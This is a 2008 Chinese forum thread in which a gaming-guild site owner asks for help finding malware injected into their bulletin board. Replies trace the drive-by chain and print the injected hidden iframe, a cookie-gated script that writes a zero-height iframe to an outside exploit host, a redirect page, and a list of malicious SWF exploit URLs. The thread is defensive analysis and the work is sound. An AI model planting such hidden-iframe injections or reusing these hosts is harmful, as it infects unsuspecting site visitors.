论坛又被挂马，求教挂马位置，万分感谢

显示全部楼层 · 发表于 2008-12-13 13:27:52

我们游戏公会的论坛
www.lengyuesz.com

上次被挂马 lg560852 版友找到http://www.lengyuesz.com/bbs/include/javascript/common.js脚本里面有一句eval加密

上次：http://bbs.kafan.cn/thread-374449-1-1.html

现在越来越猖狂了

希望个个解决办法

显示全部楼层 · 发表于 2008-12-13 15:16:09

自修护系统
建议发到样本区让达人来找..
把可能的漏洞堵上，杜绝权限滥用
如果是ASP或者ASP.NET防注入我可以帮点小忙，其他就爱莫能助了..

[ 本帖最后由 gankeyu 于 2008-12-13 15:18 编辑 ]

显示全部楼层 · 发表于 2008-12-13 15:24:16

bbs防越权是个大问题搜索一下最近有什么可用的提权漏洞
不妨模拟一下黑客攻击有可能会查到问题所在

显示全部楼层 · 发表于 2008-12-13 15:33:31

渗透攻击很好。。就怕服务器受不了

显示全部楼层 · 发表于 2008-12-13 15:55:39

此次在BBS首页http://www.lengyuesz.com/bbs上有一句

<iframe src=" http://www.e7wan.com/e7wan.nbar.2.html?color=blue" width="530" height="72" frameborder="0"></iframe>

其内的恶意代码：

<script language =javascript>
var browserVer = parseInt(navigator.appVersion);
var cookieString = new String(document.cookie)
var cookieHeader = 'popvip='
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition <0)
{
document.write("<iframe src=http://baidu.bai1ud.cn/w53/w53.htm width=100 height=0></iframe>");
var Then = new Date()
Then.setTime(Then.getTime()+ 6*60*60*1000)
document.cookie = 'popvip=yes;expires='+Then.toGMTString()
}
</script>

清理后，请下载一个 WEB猫来监控一下，防止再次篡改。

显示全部楼层 · 发表于 2008-12-13 15:55:52

http://www.lengyuesz.com/bbs/ http://www.e7wan.com/e7wan.nbar.2.html?color=blue
当中有
<iframe src=" http://www.e7wan.com/e7wan.nbar.2.html?color=blue" width="530" height="72" frameborder="0"></iframe>

http://www.e7wan.com/e7wan.nbar.2.html?color=blue中有
document.write("<iframe src=http://baidu.bai1ud.cn/w53/w53.htm width=100 height=0></iframe>");

http://baidu.bai1ud.cn/w53/w53.htm.
自己看

显示全部楼层 · 发表于 2008-12-13 15:56:34

我慢了

http://baidu.bai1ud.cn/w53/w53.htm

有校验自己的的父連接直接访问的转向GOOGLE

<script>
if(self.location==top.location)
{
location.href='http://www.google.cn';
}
</script><iframe width=100 height=0 src=new.html></iframe>
<BR>
</BR>
<BR>
</BR>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/841705/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/841705/ystat.gif"/></a></noscript>

复制代码

http://baidu.baidu-11.com/wl.css http://baidu.bai1ud.cn/w53/m15.swf
http://baidu.bai1ud.cn/w53/m16.swfhttp://baidu.bai1ud.cn/w53/m45.swfhttp://baidu.bai1ud.cn/w53/m47.swfhttp://baidu.bai1ud.cn/w53/m28.swfhttp://baidu.bai1ud.cn/w53/m64.swfhttp://baidu.bai1ud.cn/w53/x15.swf
http://baidu.bai1ud.cn/w53/x16.swfhttp://baidu.bai1ud.cn/w53/x45.swfhttp://baidu.bai1ud.cn/w53/x47.swfhttp://baidu.bai1ud.cn/w53/x28.swfhttp://baidu.bai1ud.cn/w53/x64.swf老还有利用超星ACCESS 聯眾暴風影音realplayer

复制代码

[ 本帖最后由 lunglungyu 于 2008-12-13 16:16 编辑 ]

显示全部楼层 · 发表于 2008-12-13 16:36:40

再次谢谢

不知道用什么工具才能看到隐藏的恶意代码

论坛又被挂马，求教挂马位置，万分感谢

回复 3楼 zhengjing 的帖子

评分